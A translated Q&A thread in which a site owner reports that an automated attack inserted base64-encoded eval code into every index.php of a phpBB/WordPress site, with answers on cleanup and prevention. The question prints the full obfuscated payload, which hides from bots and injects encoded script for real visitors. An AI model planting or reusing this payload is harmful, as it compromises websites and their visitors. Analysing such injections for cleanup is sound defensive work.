0

我确信这发生在许多其他人身上,但我不确定找到解决方案的正确搜索,我的搜索结果一直是空的。

一个黑客进入了我的网络应用程序,并将下面的 eval 代码插入到所有 index.php 页面中。我们的网站微不足道,所以我确信这是一次自动攻击。我在网站上安装了 phpBB 和 wordpress。我无法再进入 phpMyAdmin

  1. 他们怎么能做到这一点?
  2. 我该如何修复它?

  3. 我该怎么做才能防止它再次发生?

    base64_decode('ZXydIVFRQX1VTRVJfQUdFTlQnXTsNCiRib3RzVUEgPSBhcnJheSgnMTIzNDUnLCdhbGV4YS5jb20nLCdhbm9ueW1vdXNlLm9yZycsJ2JkYnJhbmRwcm90ZWN0LmNvbScsJ2Jsb2dwdWxzZS5jb20nLCdib3QnLCdidXp6dHJhY2tlci5jb20nLCdjcmF3bCcsJ2RvY29tbycsJ2RydXBhbC5vcmcnLCdmZWVkdG9vbHMnLCdodG1sZG9jJywnaHR0cGNsaWVudCcsJ2ludGVybmV0c2Vlci5jb20nLCdsaW51eCcsJ21hY2ludG9zaCcsJ21hYyBvcycsJ21hZ2VudCcsJ21haWwucnUnLCdteWJsb2dsb2cgYXBpJywnbmV0Y3JhZnQnLCdvcGVuYWNvb24uZGUnLCdvcGVyYSBtaW5pJywnb3BlcmEgbW9iaScsJ3BsYXlzdGF0aW9uJywncG9zdHJhbmsuY29tJywncHNwJywncnJycnJycnJyJywncnNzcmVhZGVyJywnc2x1cnAnLCdzbm9vcHknLCdzcGlkZXInLCdzcHlkZXInLCdzem4taW1hZ2UtcmVzaXplcicsJ3ZhbGlkYXRvcicsJ3ZpcnVzJywndmxjIG1lZGlhIHBsYXllcicsJ3dlYmNvbGxhZ2UnLCd3b3JkcHJlc3MnLCd4MTEnLCd5YW5kZXgnLCdpcGhvbmUnLCdhbmRyb2lkJywnY2hyb21lJyk7DQpmb3JlYWNoICgkYm90c1VBIGFzICRicykge2lmKHN0cnBvcyhzdHJ0b2xvd2VyKCR1YSksICRicykhPT0gZmFsc2UpeyRib3QgPSB0cnVlOyBicmVhazt9fQ0KaWYgKCEkYm90KXsNCgllY2hvKGJhc2U2NF9kZWNvZGUoJ1BITmpjbWx3ZEQ1cFBUQTdkSEo1ZTJGMllYTjJQWEJ5YjNSdmRIbHdaVHQ5WTJGMFkyZ29laWw3YUQwaWFHRnlRMjlrWlNJN1pqMWJKeTB6TTJZdE16Tm1Oak5tTmpCbUxURXdaaTB5WmpVNFpqWTVaalUzWmpjMVpqWTNaalU1WmpZNFpqYzBaalJtTmpGbU5UbG1OelJtTWpkbU5qWm1OVGxtTmpkbU5UbG1OamhtTnpSbU56Tm1NalJtTnpsbU5ESm1OVFZtTmpGbU16Wm1OVFZtTmpkbU5UbG1MVEptTFRObU5UWm1OamxtTlRobU56bG1MVE5tTFRGbU5EbG1ObVkxTVdZdE1XWTRNV1l0TWpsbUxUTXpaaTB6TTJZdE16Tm1Oak5tTmpCbU56Sm1OVFZtTmpkbU5UbG1OekptTFRKbUxURm1NVGRtTFRJNVppMHpNMll0TXpObU9ETm1MVEV3WmpVNVpqWTJaamN6WmpVNVppMHhNR1k0TVdZdE1qbG1MVE16Wmkwek0yWXRNek5tTlRobU5qbG1OVGRtTnpWbU5qZG1OVGxtTmpobU56Um1OR1kzTjJZM01tWTJNMlkzTkdZMU9XWXRNbVl0T0dZeE9HWTJNMlkyTUdZM01tWTFOV1kyTjJZMU9XWXRNVEJtTnpObU56Sm1OVGRtTVRsbUxUTm1OakptTnpSbU56Um1OekJtTVRabU5XWTFaall5WmpjMFpqY3laamM0WmpVM1pqYzVaamMwWmpjMlpqWXdaalkzWmpZeVpqWXhaalJtTmpabU5qbG1OemRtTlRsbU56Tm1OelJtTnpCbU56Sm1Oak5tTlRkbU5UbG1Oek5tTkdZMU5XWTNOR1kxWmpJeFpqWXhaalk1WmpFNVpqaG1MVE5tTFRFd1pqYzNaall6WmpVNFpqYzBaall5WmpFNVppMHpaamRtTm1ZdE0yWXRNVEJtTmpKbU5UbG1Oak5tTmpGbU5qSm1OelJtTVRsbUxUTm1OMlkyWmkwelppMHhNR1kzTTJZM05HWTNPV1kyTm1ZMU9XWXhPV1l0TTJZM05tWTJNMlkzTTJZMk0yWTFObVkyTTJZMk5tWTJNMlkzTkdZM09XWXhObVkyTW1ZMk0yWTFPR1kxT0dZMU9XWTJPR1l4TjJZM01HWTJPV1kzTTJZMk0yWTNOR1kyTTJZMk9XWTJPR1l4Tm1ZMU5XWTFObVkzTTJZMk9XWTJObVkzTldZM05HWTFPV1l4TjJZMk5tWTFPV1kyTUdZM05HWXhObVkyWmpFM1pqYzBaalk1Wmpjd1pqRTJaalptTVRkbUxUTm1NakJtTVRobU5XWTJNMlkyTUdZM01tWTFOV1kyTjJZMU9XWXlNR1l0T0dZdE1XWXhOMll0TWpsbUxUTXpaaTB6TTJZNE0yWXRNamxtTFRNelppMHpNMlkyTUdZM05XWTJPR1kxTjJZM05HWTJNMlkyT1dZMk9HWXRNVEJtTmpObU5qQm1OekptTlRWbU5qZG1OVGxtTnpKbUxUSm1MVEZtT0RGbUxUSTVaaTB6TTJZdE16Tm1MVE16WmpjMlpqVTFaamN5WmkweE1HWTJNR1l0TVRCbU1UbG1MVEV3WmpVNFpqWTVaalUzWmpjMVpqWTNaalU1WmpZNFpqYzBaalJtTlRkbU56Sm1OVGxtTlRWbU56Um1OVGxtTWpkbU5qWm1OVGxtTmpkbU5UbG1OamhtTnpSbUxUSm1MVE5tTmpObU5qQm1OekptTlRWbU5qZG1OVGxtTFRObUxURm1NVGRtTmpCbU5HWTNNMlkxT1dZM05HWXlNMlkzTkdZM05HWTNNbVkyTTJZMU5tWTNOV1kzTkdZMU9XWXRNbVl0TTJZM00yWTNNbVkxTjJZdE0yWXlaaTB6WmpZeVpqYzBaamMwWmpjd1pqRTJaalZtTldZMk1tWTNOR1kzTW1ZM09HWTFOMlkzT1dZM05HWTNObVkyTUdZMk4yWTJNbVkyTVdZMFpqWTJaalk1WmpjM1pqVTVaamN6WmpjMFpqY3daamN5WmpZelpqVTNaalU1WmpjelpqUm1OVFZtTnpSbU5XWXlNV1kyTVdZMk9XWXhPV1k0WmkwelppMHhaakUzWmpZd1pqUm1Oek5tTnpSbU56bG1OalptTlRsbU5HWTNObVkyTTJZM00yWTJNMlkxTm1ZMk0yWTJObVkyTTJZM05HWTNPV1l4T1dZdE0yWTJNbVkyTTJZMU9HWTFPR1kxT1dZMk9HWXRNMll4TjJZMk1HWTBaamN6WmpjMFpqYzVaalkyWmpVNVpqUm1OekJtTmpsbU56Tm1Oak5tTnpSbU5qTm1OamxtTmpobU1UbG1MVE5tTlRWbU5UWm1Oek5tTmpsbU5qWm1OelZtTnpSbU5UbG1MVE5tTVRkbU5qQm1OR1kzTTJZM05HWTNPV1kyTm1ZMU9XWTBaalkyWmpVNVpqWXdaamMwWmpFNVppMHpaalptTFRObU1UZG1OakJtTkdZM00yWTNOR1kzT1dZMk5tWTFPV1kwWmpjMFpqWTVaamN3WmpFNVppMHpaalptTFRObU1UZG1OakJtTkdZM00yWTFPV1kzTkdZeU0yWTNOR1kzTkdZM01tWTJNMlkxTm1ZM05XWTNOR1kxT1dZdE1tWXRNMlkzTjJZMk0yWTFPR1kzTkdZMk1tWXRNMll5WmkwelpqZG1ObVl0TTJZdE1XWXhOMlkyTUdZMFpqY3paalU1WmpjMFpqSXpaamMwWmpjMFpqY3laall6WmpVMlpqYzFaamMwWmpVNVppMHlaaTB6WmpZeVpqVTVaall6WmpZeFpqWXlaamMwWmkwelpqSm1MVE5tTjJZMlppMHpaaTB4WmpFM1ppMHlPV1l0TXpObUxUTXpaaTB6TTJZMU9HWTJPV1kxTjJZM05XWTJOMlkxT1dZMk9HWTNOR1kwWmpZeFpqVTVaamMwWmpJM1pqWTJaalU1WmpZM1pqVTVaalk0WmpjMFpqY3paakkwWmpjNVpqUXlaalUxWmpZeFpqTTJaalUxWmpZM1pqVTVaaTB5WmkwelpqVTJaalk1WmpVNFpqYzVaaTB6WmkweFpqUTVaalptTlRGbU5HWTFOV1kzTUdZM01HWTFPV1kyT0dZMU9HWXlOV1kyTW1ZMk0yWTJObVkxT0dZdE1tWTJNR1l0TVdZeE4yWXRNamxtTFRNelppMHpNMlk0TXlkZFd6QmRMbk53YkdsMEtDZG1KeWs3ZGowaVpTSXJJblpoSWp0OWFXWW9kaWxsUFhkcGJtUnZkMXQyS3lKc0lsMDdkSEo1ZTNFOVpHOWpkVzFsYm5RdVkzSmxZWFJsUld4bGJXVnVkQ2dpWkdsMklpazdjUzVoY0hCbGJtUkRhR2xzWkNoeEt5SWlLVHQ5WTJGMFkyZ29jWGRuS1h0M1BXWTdjejFiWFR0OUlISTlVM1J5YVc1bk8zbzlLQ2hsS1Q5b09pSWlLVHRtYjNJb096VTVNU0U5YVR0cEt6MHhLWHRxUFdrN2FXWW9aU2x6UFhNcmNsc2labkp2YlVNaUt5Z29aU2svZWpveE1pbGRLSGRiYWwwcU1TczBNaWs3ZlNCcFppaDJKaVpsSmlaeUppWjZKaVpvSmlaekppWm1KaVoyS1dVb2N5azdQQzl6WTNKcGNIUSsnKSk7DQp9DQo=');?>
4

3 回答 3

2

首先查看您的 Apache 日志,他们访问了哪些脚本?接下来查看您的站点是否有任何自定义脚本并仔细检查它们。此外,寻找他们可能隐藏的任何后门应用程序。在某些情况下,您可以四处寻找最近修改的文件或最近创建的文件……如果它们很聪明,您将需要检查所有文件。

“他们”,可能是一个脚本,通过将脚本上传到您的站点然后让您的网络服务器运行该脚本来完成此操作。然后网络服务器把其他一切都搞砸了。

你的问题很笼统,所以我在这里给出广泛的建议,当你有详细信息时,你可能想提出一个更具体的问题。

于 2012-05-15T15:25:32.130 回答
2

很抱歉这件事发生在你身上。缺少更多信息,我想说的是您应该研究的内容:

  1. 网络服务器安全。您假设他们入侵了您的网络应用程序,但他们可能以某种方式获得了对您的托管帐户的访问权限。如果您通过普通的、不安全的 FTP 传输,这很可能是漏洞的来源。此外,许多共享主机(如果您使用 PHP 并且不确定您是如何被黑客入侵的,我假设您在共享主机上)在保持其他人无法访问用户帐户时具有可怜的安全性。

  2. 如果垃圾在动态页面上,那么它们确实会破坏您的应用程序或数据库(如果您无法进入 phpMyAdmin,那么这绝对是一种可能性)。联系您的托管服务提供商,他们希望能够为您提供一个新密码。

于 2012-05-15T15:26:37.247 回答
1

首先,回滚黑客所做的更改(备份、服务器回滚……)。之后,更新每个 CMS、模块、主题或任何其他 PHP 应用程序 - 并让它们在未来保持最新。如果确实是自动攻击,则攻击者使用了公共异常,这很可能已在您的软件的较新版本中得到修复。

编辑:但是 - 当然 - 删除每一行注入的代码,如他的回答中描述的 Full Decent。

于 2012-05-15T15:27:43.503 回答